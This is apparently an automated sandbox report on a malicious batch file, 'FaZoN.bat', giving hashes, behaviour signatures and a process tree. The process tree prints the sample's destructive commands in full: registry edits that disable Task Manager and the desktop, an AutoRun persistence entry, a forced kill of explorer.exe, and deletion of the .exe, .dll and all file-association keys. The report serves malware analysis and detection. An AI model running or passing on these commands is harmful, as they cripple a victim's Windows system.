Analysis

  • max time kernel
    132s
  • max time network
    60s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    02-03-2024 20:26

General

  • Target

    TrashMalwares-main/FaZoN.bat

  • Size

    1KB

  • MD5

    2a2c2cca38f2e34ee666d4534834dcbb

  • SHA1

    8ffa496f4e56c6406f8f965059483125966c6fdd

  • SHA256

    6397c16efa9b0ff4732002d37a948192b1df49c0c2c927806622fa59d3ac1b46

  • SHA512

    e05a896d8bcad42c04b69c14be3b625d1f586049b2a5925d08bae47f47429b44669904e22daaf94c003bbd697957bddf6067e1aaccc9dd4cb7c607a1d78686d0

Score
8/10

Malware Config

Signatures

  • Disables Task Manager via registry modification
  • Modifies Installed Components in the registry (2 TTPs, 1 IoCs)
  • Deletes itself (1 IoCs)
  • Drops file in System32 directory (2 IoCs)
  • Kills process with taskkill (1 IoCs)
  • Modifies registry class (7 IoCs)
  • Modifies registry key (1 TTPs, 4 IoCs)
  • Suspicious use of AdjustPrivilegeToken (19 IoCs)
  • Suspicious use of FindShellTrayWindow (29 IoCs)
  • Suspicious use of SendNotifyMessage (17 IoCs)
  • Suspicious use of WriteProcessMemory (54 IoCs)
  • Uses Task Scheduler COM API (1 TTPs)

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\FaZoN.bat"
    • Deletes itself
    • Drops file in System32 directory
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2068
    • C:\Windows\system32\msg.exe
      msg * Gosha created by GGmex your computer infected
      PID:2612
    • C:\Windows\system32\taskkill.exe
      taskkill /f /im explorer.exe
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2648
    • C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d C:\Windows\explorer.exe /f
      • Modifies registry key
      PID:2708
    • C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      • Modifies registry key
      PID:2572
    • C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
      • Modifies registry key
      PID:2908
    • C:\Windows\explorer.exe
      explorer.exe
      • Modifies Installed Components in the registry
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2444
    • C:\Windows\system32\msg.exe
      msg * Your desktop has been crashed
      PID:2876
    • C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      • Modifies registry key
      PID:2668
    • C:\Windows\system32\msg.exe
      msg * Your windows infected by gosha :)
      PID:2584
    • C:\Windows\system32\reg.exe
      reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\syste m32\gosha.bat" /f
      PID:2464
    • C:\Windows\system32\msg.exe
      msg * Deleted files
      PID:2412
    • C:\Windows\system32\msg.exe
      msg * Your system has been removed...
      PID:2452
    • C:\Windows\system32\msg.exe
      msg * Click OK
      PID:1844
    • C:\Windows\system32\cmd.exe
      cmd
      PID:3032
    • C:\Windows\system32\reg.exe
      reg delete HKCR/.exe
      PID:2460
    • C:\Windows\system32\reg.exe
      reg delete HKCR/.dll
      PID:2036
    • C:\Windows\system32\reg.exe
      reg delete HKCR/*
      PID:2148
    • C:\Windows\system32\cmd.exe
      cmd
      PID:2388

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/2444-4-0x00000000040C0000-0x00000000040C1000-memory.dmp
    Filesize: 4KB
  • memory/2444-5-0x00000000040C0000-0x00000000040C1000-memory.dmp
    Filesize: 4KB
  • memory/2444-9-0x00000000037B0000-0x00000000037C0000-memory.dmp
    Filesize: 64KB